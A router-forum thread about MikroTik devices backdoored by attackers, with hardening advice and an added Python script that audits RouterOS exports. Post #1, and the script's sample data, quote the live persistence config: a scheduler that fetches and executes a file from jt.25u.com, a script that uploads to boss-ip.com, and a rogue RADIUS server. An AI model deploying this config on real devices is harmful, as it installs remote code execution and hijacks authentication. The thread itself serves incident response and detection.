#1 lonthong2002 (Member Senior)

    Has anyone been hit by a backdoor like this?

    A few days ago one of my routers could not be accessed with the usual user and login (the router was running normally)...
    luckily there was still a backup user to log in with... I tried the backup user and it could log in..

    after logging in I saw several admin users online... the src showed lots of outside IPs... (mostly IPs from Russia)
    uh-oh... I've been hacked, I thought....
    I immediately did a /system reset,
    after the reset... back to the default config... I set it up again and the router worked as usual

    but a few weeks later I could no longer access that router...
    I had to log in with the backup user again...

    after logging in... whoa... the same thing happened again... there were lots of admin users logged in...
    I checked and several rules had been created

    I looked around on other forums.. turns out many people have experienced the same thing as me

    this is exactly what happened to me....

    has anyone here experienced something similar?
    don't try the script below, OK....

    below is a copy-paste from another forum

    Your story sounds similar to my own!
    I saw one of my servers go offline, which was depending on a NAT filter to get its proper external static IP.
    Whatever it is, it goes in and adds: new admin users, PPP RADIUS connections, IP pools, scripts, masquerade rules to run every now and again and on startup, which verifies the infection of the device, re-infects it if not infected and, from what I can tell, uploads it.. somewhere..... Not sure how it's getting in, but it's nasty.

    I checked another Tick I know of and it was also affected....
    To no coincidence, I saw a service tech hanging out of the local large WISP core; he looked to be doing some "maintenance".

    Below are some configs that were added by it.

    This happened on RB2011 6.41.4 & 6.42.3
    BST
    Code:

    add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
    /system scheduler
    add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
    add interval=30m name=a on-event=ip policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-time=startup
    /ppp aaa
    set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
    /radius
    add address=47.75.230.175 secret=test service=ppp
    /radius incoming
    set accept=yes

#2 adhielesmana (Administrator)
    Originally Posted by lonthong2002 (quoting post #1 above in full)
    Try upgrading to the latest version and disable the telnet, ssh and ftp services. Change the user password and don't use the admin user.
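A defender-side check that serves both posts above (the indicators lonthong2002 quotes and the hardening advice in this reply), added here as an example; it is not code from either post or from MikroTik. It parses the text that RouterOS `/export` prints (assuming wrapped lines end in a backslash, as in the quoted config), then flags scheduler entries that fetch or execute remote content, scripts that call out to a URL and the schedulers that run them by name, RADIUS servers not on an allow-list, unknown full-access users, the default `admin` account, and any of the management services the reply says to disable that is still enabled. The function names, rule set and severities are mine; the sample export is constructed, reusing the host names and address quoted in the thread, with made-up `/user` and `/ip service` blocks.

```python
"""Audit a RouterOS /export for the persistence indicators discussed in this thread.
Added example, not code from the posts or from MikroTik; assumes wrapped export lines
end in a backslash, as in the quoted config."""
import re

# Constructed sample: the script, scheduler and RADIUS lines reuse the indicators quoted
# in the thread; the /user and /ip service blocks are made up for the demonstration.
SAMPLE_EXPORT = r'''
/user
add name=admin group=full
add name=backup group=full
add name=service group=full
/system script
add name=ip owner=admin policy=\
    reboot,read,write,policy,test,password,sniff,sensitive source="{/tool fetch \
    url=(\"http://www.boss-ip.com/Core/Update.ashx\\\?key=bdee03097da1df40&actio\
    n=upload&sncode=D26B162F4AE05A0DF07BB92B3480114A&dynamic=static\")}"
/system scheduler
add interval=10m name=autosupout on-event=":if ([/file find name=autosupout1.rif\
    ]=\"\") do={\r\
    \n:local ssip [:resolve jt.25u.com server=8.8.8.8]\r\
    \n/tool fetch url=\"http://\$ssip:81/autosupout1.rif\" dst-path=autosupout1.\
    rif\r\
    \n}\r\
    \nexecute [/file get autosupout1.rif contents]" policy=\
    ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon \
    start-date=jan/01/1970 start-time=00:00:00
add interval=30m name=a on-event=ip policy=ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-time=startup
add interval=1d name=backup-nightly on-event="/system backup save name=nightly"
/ppp aaa
set interim-update=1m use-circuit-id-in-nas-port-id=yes use-radius=yes
/radius
add address=47.75.230.175 secret=test service=ppp
/radius incoming
set accept=yes
/ip service
set telnet disabled=no
set ftp disabled=no
set ssh disabled=no
set api disabled=yes
'''

KV_RE = re.compile(r'([\w-]+)=("(?:[^"\\]|\\.)*"|\S+)')  # key=value, value may be quoted
NET_RE = re.compile(r'/tool fetch|https?://|\bexecute\b', re.I)  # network / exec verbs
REMOTE_SERVICES = {'telnet', 'ssh', 'ftp', 'www', 'api'}  # the reply says: disable these


def parse_export(text):
    """Return (section, verb, params) for each add/set line of an export."""
    text = re.sub(r'\\\n[ \t]*', '', text)  # glue wrapped lines; escapes such as \r stay
    entries, section = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith('/'):
            section = line
            continue
        m = re.match(r'(add|set)\s+(\S.*)', line)
        if not m or section is None:
            continue
        verb, rest = m.groups()
        params = {k: v.strip('"') for k, v in KV_RE.findall(rest)}
        first = rest.split(None, 1)[0]
        if re.fullmatch(r'[\w-]+', first):  # "set telnet disabled=no" names the item first
            params.setdefault('name', first)
        entries.append((section, verb, params))
    return entries


def audit(entries, known_users=frozenset(), known_radius=frozenset()):
    """Return (severity, section, message) findings; known_* are the operator's allow-lists."""
    # Scripts that reach the network; a scheduler may run one by name only ("on-event=ip").
    bad = {p.get('name') for s, _, p in entries
           if s == '/system script' and NET_RE.search(p.get('source', ''))}
    out = []
    for section, verb, p in entries:
        name, event = p.get('name', '?'), p.get('on-event', '').strip()
        if section == '/system script' and name in bad:
            out.append(('high', section, f"script '{name}' contacts an external URL"))
        elif section == '/system scheduler' and NET_RE.search(event):
            out.append(('high', section, f"scheduler '{name}' fetches or executes remote content"))
        elif section == '/system scheduler' and event in bad:
            out.append(('high', section, f"scheduler '{name}' runs suspicious script '{event}'"))
        elif section == '/ppp aaa' and p.get('use-radius') == 'yes':
            out.append(('medium', section, 'PPP authentication delegated to RADIUS'))
        elif section == '/radius' and p.get('address') not in known_radius:
            out.append(('high', section, f"unexpected RADIUS server {p.get('address')}"))
        elif section == '/radius incoming' and p.get('accept') == 'yes':
            out.append(('medium', section, 'router accepts unsolicited RADIUS requests'))
        elif section == '/user' and verb == 'add' and name == 'admin':
            out.append(('low', section, "default account 'admin' still present"))
        elif section == '/user' and verb == 'add' and name not in known_users:
            out.append(('high', section, f"unknown user '{name}' in group '{p.get('group')}'"))
        elif section == '/ip service' and name in REMOTE_SERVICES and p.get('disabled') != 'yes':
            out.append(('medium', section, f"management service '{name}' is enabled"))
    return out


def run_demo():
    """Audit the constructed sample, trusting only the two accounts the operator created."""
    return audit(parse_export(SAMPLE_EXPORT), known_users={'admin', 'backup'})
```

To use it on a real device, save the output of `/export` to a file, read it in and call `audit(parse_export(text), known_users=..., known_radius=...)` with the accounts and RADIUS servers you actually provisioned; whatever remains is what to compare against an export taken before the incident. The parser keeps the export's own escapes (`\"`, `\r\n`) inside values, so an `on-event` string is searched verbatim, and the scheduler named `a` is caught even though its `on-event` is only the name of the script that does the fetching.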

#3 lonthong2002 (Member Senior)

    [solved]

    Originally Posted by adhielesmana:
    Try upgrading to the latest version and disable the telnet, ssh and ftp services. Change the user password and don't use the admin user.
    Already done, master.... thank you for the pointers...
    Last edited by lonthong2002; 31-07-2018 at 10:44.